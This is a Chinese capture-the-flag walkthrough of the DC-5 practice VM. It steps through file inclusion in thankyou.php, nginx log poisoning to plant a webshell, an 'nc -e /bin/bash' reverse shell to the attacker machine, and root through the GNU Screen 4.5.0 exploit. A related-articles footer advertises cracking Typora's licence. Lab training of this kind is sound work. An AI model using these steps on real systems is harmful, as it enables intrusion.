DC系列靶机5通关教程

信息收集

主机扫描

sudo arp-scan -l

在这里插入图片描述

端口扫描

nmap -p- -A 192.168.16.172

image-20230916141935517

漏洞发现

浏览器访问靶机IP

image-20230916142103116

在Contact找到类似提交数据的地方

在这里插入图片描述

点击submit,数字发生变化。不断刷新的话,数字依然会发生变化

在这里插入图片描述

使用bp抓包发送重发器查看数据包

image-20230916142551068

再次点击发送查看数据返回包

image-20230916142652371

不断重发数据发现footer不断变化,感觉可能存在一个独立的脚本,爆破目录查看一下

dirsearch -u 192.168.16.172 -i 200

命令解释:

dirsearch -u 192.168.16.172 -i 200 是一个用于目录扫描的命令,下面对该命令进行详细解释:

  • dirsearch:是一个目录扫描工具,用于探测Web服务器上的目录和文件。
  • -u 192.168.16.172:指定要扫描的目标URL或IP地址。在这个示例中,目标是 192.168.16.172。你可以替换这个IP地址为需要扫描的实际目标。
  • -i 200:指定要忽略的HTTP状态码。在这个示例中,200 表示忽略返回状态码为200的响应。也就是说,当目标返回200状态码时,不会将其视为敏感路径或文件。

通过执行这条命令,dirsearch 工具将发送不同的HTTP请求到目标URL,并根据目标服务器的响应来确定是否存在可以访问的目录、文件或敏感路径。它可以帮助发现Web应用程序中可能存在的配置错误、暴露的资源、备份文件等问题。

image-20230916143735744

浏览器访问192.168.16.172这个页面

image-20230916144026968

刷新页面进行查看,刷新页面后数字发生变化

在这里插入图片描述

将bp数据包中的GET请求更改为/thankyou.php?file=footer.php然后点击发送

在这里插入图片描述

再点击发送进行查看

image-20230916144504398

可以确定这里可能存在文件包含漏洞

漏洞利用

再将访问路径改为/etc/passwd可以看到passwd文件

image-20230916144646967

说明了程序代码再处理文件包含是没有严格控制,我们可以把访问路径更改为木马文件

image-20230916144847036

image-20230916145022954

发现报了404未找到的错误

对于配置了nginx的网站,无论网站有什么操作,都会被记录在/var/log/nginx/access.log/var/log/nginx/error.log

/thankyou.php?file=/var/log/nginx/access.log

image-20230916150809591

木马上传成功,利用蚁剑进行连接

http://192.168.16.172/thankyou.php?file=/var/log/nginx/access.log

image-20230916151152459

进行反弹shell

kali进行监听

nc -lvvp 8848		#监听网段中所有8848端口

image-20230916151453996

利用蚁剑中的虚拟终端,反弹shell到攻击机kali上

nc -e /bin/bash 192.168.16.176 8848

image-20230916151655133

image-20230916152152490

再看kali已经连接到了

image-20230916152545915

使用python脚本开启交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

image-20230916152801737

查看id,发现只是普通用户的权限

image-20230916152945236

权限提升

find / -user root -prem /4000 2>/dev/null

image-20230916153431607

经过查找得知GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。用户可以通过该软件同时连接多个本地或远程的命令行会话,并在其间自由切换。GNU Screen可以看作是窗口管理器的命令行界面版本。它提供了统一的管理多个会话的界面和相应的功能。

尝试用searchsploit搜索是否存在漏洞,重新打开一个终端进行漏洞查找

searchsploit screen 4.5.0

image-20230916153727334

找出41154.sh的绝对路径

searchsploit -p linx/local/41151.sh

image-20230916154046191

查看文件内容

cat /usr/share/exploitdb/exploits/linux/local/41154.sh

image-20230916154658425

按照文件的说明,可分为三部分,将第一个框里内容保存为第一文件,名为libhax.c,然后使用黄色选取的命令编译,编译结束会生成libhax.so文件。

第二个框里内容保存为rootshell.c文件,使用黄色选区的命令编译,编译结束后生成rootshell文件。

将第三个框里内容保存为第三个文件,保存为run.sh 。 这个名字随意。
image-20230916160056079

通过蚁剑把libhax.crootshell.c拖进靶机跟目录下的tmp目录下

image-20230916160306990

在虚拟终端中对libhax.crootshell.c这两个文件进行编译

image-20230916160652040

image-20230916161235492

在蚁剑中点击文件管理,进入根目录下的tmp目录进行刷新后编译的文件就出来了

image-20230916161416327

然后把 run.sh也通过蚁剑拖进靶机根目录下的tmp目录中,注意是 /tmp/

image-20230916161547728

那么原来的libhax.crootshell.c这两个文件可以删除了,因为已经编译好了,留着也没有价值

image-20230916161742668

回到通过python得到的交互式的shell里,切换到/tmp目录下

image-20230916162001033

image-20230916162032727

运行run.sh输入bash ./run.sh进行提权

image-20230916162142278

通过查看id已知是root用户

进入/root查看是否有flag

image-20230916162413908

总结

信息收集主机发现  netdiscouver端口扫描  nmap目录爆破  dirsearch
漏洞利用bp抓包分析数据包,测试到有文件包含漏洞木马上传,查看日志反弹shellpython交互shell
提权find / -user root -perm /4000 2>/dev/null#找到所有具有root权限的可执行文件searchsploit screen 4.5.0#通过searchsploit找到Screen这款由GNU计划开发的用于命令行终端切换的自由软件的漏洞libhax.c和rootshell.c文件的编译  run.shbash ./run.sh  提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/80899.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

k8s优雅停服

k8s优雅停服

在应用程序的整个生命周期中,正在运行的 pod 会由于多种原因而终止。在某些情况下,Kubernetes 会因用户输入(例如更新或删除 Deployment 时)而终止 pod。在其他情况下,Kubernetes 需要释放给定节点上的资源时会终止 po…
阅读更多...
浅谈C++|类的成员

浅谈C++|类的成员

一.类对象作为类成员 类可以作为另一个类的成员 代码&#xff1a; #include <iostream> using namespace std; class phone { public:string shouji;phone(string shouji1) :shouji(shouji1) {cout << "phone的构造函数调用" << endl;}~phone() …
阅读更多...
Mac版本破解Typora,解决Mac安装软件的“已损坏,无法打开。 您应该将它移到废纸篓”问题

Mac版本破解Typora,解决Mac安装软件的“已损坏,无法打开。 您应该将它移到废纸篓”问题

一、修改配置文件 首先去官网选择mac版本下载安装 typora下载 然后打开typora包内容找到 /Applications/Typora.app/Contents/Resources/TypeMark/ 编辑器打开上面文件夹&#xff0c;这里我拉到vscode 找到page-dist/static/js/Licen..如下图 输入 hasActivated"…
阅读更多...
周易算卦流程c++实现

周易算卦流程c++实现

代码 #include<iostream> using namespace std; #include<vector> #include<cstdlib> #include<ctime> #include<Windows.h>int huaYiXiangLiang(int all, int& left) {Sleep(3000);srand(time(0));left rand() % all 1;while (true) {if…
阅读更多...
Dell 服务器远程安装操作系统

Dell 服务器远程安装操作系统

登录Dell服务器管理页面 1、网络连接服务器的idrac的管理口 2、确保本地电脑与服务器的管理口可以正常通信。通过浏览器访问服务器idrac口的ip地址。建议使用IE浏览器。 默认IP地址: 192.168.0.120 子网掩码: 255.255.255.0 默认网关: 192.168.0.1 默认用户名: …
阅读更多...
LeetCode算法心得——和可被 K 整除的子数组(前缀和+HashMap)

LeetCode算法心得——和可被 K 整除的子数组(前缀和+HashMap)

大家好&#xff0c;我是晴天学长&#xff0c;同余定理的应用&#xff0c;需要的小伙伴可以关注支持一下哦&#xff01;后续会继续更新的。 1) .和可被 K 整除的子数组 题目描述 给定一个整数数组 A&#xff0c;返回其中元素之和可被 K 整除的&#xff08;连续、非空&#xff0…
阅读更多...
Linux网络基础

Linux网络基础

一.协议的概念 1.1协议的概念 什么是协议 从应用的角度出发&#xff0c;协议可理解为“规则”&#xff0c;是数据传输和数据的解释的规则。假设&#xff0c;A、B双方欲传输文件。规定: 第一次&#xff0c;传输文件名&#xff0c;接收方接收到文件名&#xff0c;应答OK给传输方…
阅读更多...
合宙Air724UG LuatOS-Air LVGL API控件-截屏(Screenshots)

合宙Air724UG LuatOS-Air LVGL API控件-截屏(Screenshots)

截屏&#xff08;Screenshots&#xff09; 分 享导出pdf 截屏功能&#xff0c;core版本号要>3211 示例代码 -- 创建图片控件img lvgl.img_create(lvgl.scr_act(), nil)-- 设置图片显示的图像lvgl.img_set_src(img, "/lua/test.png")-- 图片居中lvgl.obj_align(…
阅读更多...
QT基础教学(QMainWindow)

QT基础教学(QMainWindow)

文章目录 前言一、QMainWindow介绍二、代码示例三、QMainWindow高级用法总结 前言 之前我们都是在QWidget中来进行学习的&#xff0c;那么今天我将为大家讲解一下QMainWindow。 一、QMainWindow介绍 QMainWindow是Qt框架提供的一个重要的窗口类&#xff0c;用于创建具有标准…
阅读更多...
c语言输出杨辉三角

c语言输出杨辉三角

#include<stdio.h> int main() {int x 0; //表示杨辉三角的的大小int y 1;printf("请输入x的值: ");scanf("%d", &x);for (int i 0; i < x; i) {for (int j 0; j < i; j) {if (j 0 || i 0) {y 1;}else {y y * (i - j 1) / j;}pri…
阅读更多...
c#动态保留小数位数的数值格式化方法实例----从小数点后非零数字保留两位进行四舍五入

c#动态保留小数位数的数值格式化方法实例----从小数点后非零数字保留两位进行四舍五入

c#动态保留小数位数的数值格式化方法实例----从小数点后非零数字保留两位进行四舍五入 1、功能介绍2、代码案例3、输出结果4、封装扩展方法5、控制台调用 6、其他方法地址 1、功能介绍 1. 输入的数字是整数&#xff0c;则直接返回整数部分的字符串表示。 2. 如果输入的数字是…
阅读更多...
SpringBoot集成Apache RocketMQ详解

SpringBoot集成Apache RocketMQ详解

文章目录 0. 前言1. Spring Boot 集成Apache RocketMQ详细步骤1.1.添加依赖1.2.配置RocketMQ1.3.创建消息生产者&#xff08;Producer&#xff09;1.4.创建消息消费者&#xff08;Consumer&#xff09; 2. 测试验证3. 常见报错4. 参考文档5. 源码地址 0. 前言 上个章节我们学习…
阅读更多...
4G版本云音响设置教程腾讯云平台版本

4G版本云音响设置教程腾讯云平台版本

文章目录 4G本云音响设置教程介绍一、申请设备三元素1.腾讯云物联网平台2.创建产品3.设置产品参数4.添加设备5.获取三元素 二、设置设备三元素1.打开MQTTConfigTools2.计算MQTT参数3.使用USB连接设备4.设置参数 三、腾讯云物联网套件协议使用说明1.推送协议信息2.topic规则说明…
阅读更多...
JDK16特性

JDK16特性

文章目录 一、JAVA16概述二、语法层面变化1.密封类&#xff08;第二次预览&#xff09;2.instanceof 的模式匹配3.记录类习惯4基于值的类的警告 三、API层面变化1 Vector API&#xff08;孵化器&#xff09; 四、其他变化1.启用 C14 语言功能2.从 Mercurial 迁移到 Git3.ZGC&am…
阅读更多...
Microsoft Excel 101 简介

Microsoft Excel 101 简介

什么是 Microsoft Excel&#xff1f; Microsoft Excel 是一个电子表格程序&#xff0c;用于记录和分析数值数据。 将电子表格想像成构成表格的列和行的集合。 字母通常分配给列&#xff0c;数字通常分配给行。 列和行相交的点称为像元。 单元格的地址由代表列的字母和代表行的…
阅读更多...
【C++】LeetCode 160 相交链表

【C++】LeetCode 160 相交链表

今天再写一道算法题&#xff08;这两周都写算法题有点摆烂&#xff09; 题目 给你两个单链表的头节点 headA 和 headB &#xff0c;请你找出并返回两个单链表相交的起始节点。如果两个链表不存在相交节点&#xff0c;返回 null 。 图示两个链表在节点 c1 开始相交&#xff1…
阅读更多...
安防监控/视频汇聚/云存储/AI智能视频分析平台EasyCVR下级海康设备无法级联是什么原因?

安防监控/视频汇聚/云存储/AI智能视频分析平台EasyCVR下级海康设备无法级联是什么原因?

安防视频监控平台/视频集中存储/云存储/磁盘阵列EasyCVR可拓展性强、视频能力灵活、部署轻快&#xff0c;可支持的主流标准协议有国标GB28181、RTSP/Onvif、RTMP等&#xff0c;以及支持厂家私有协议与SDK接入&#xff0c;包括海康Ehome、海大宇等设备的SDK等。 有用户反馈&…
阅读更多...
[JAVAee]spring-Bean对象的执行流程与生命周期

[JAVAee]spring-Bean对象的执行流程与生命周期

执行流程 spring中Bean对象的执行流程大致分为四步: 启动Spring容器实例化Bean对象Bean对象注册到Spring容器中将Bean对象装配到所需的类中 ①启动Spring容器,在main方法中获取spring上下文对象并配备spring. import demo.*;import org.springframework.context.Applicati…
阅读更多...
pt26django教程

pt26django教程

admin 后台数据库管理 django 提供了比较完善的后台管理数据库的接口&#xff0c;可供开发过程中调用和测试使用 django 会搜集所有已注册的模型类&#xff0c;为这些模型类提拱数据管理界面&#xff0c;供开发者使用 创建后台管理帐号: [rootvm mysite2]# python3 manage.…
阅读更多...
LeetCode 753. 破解保险箱【欧拉回路,DFS】困难

LeetCode 753. 破解保险箱【欧拉回路,DFS】困难

本文属于「征服LeetCode」系列文章之一&#xff0c;这一系列正式开始于2021/08/12。由于LeetCode上部分题目有锁&#xff0c;本系列将至少持续到刷完所有无锁题之日为止&#xff1b;由于LeetCode还在不断地创建新题&#xff0c;本系列的终止日期可能是永远。在这一系列刷题文章…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023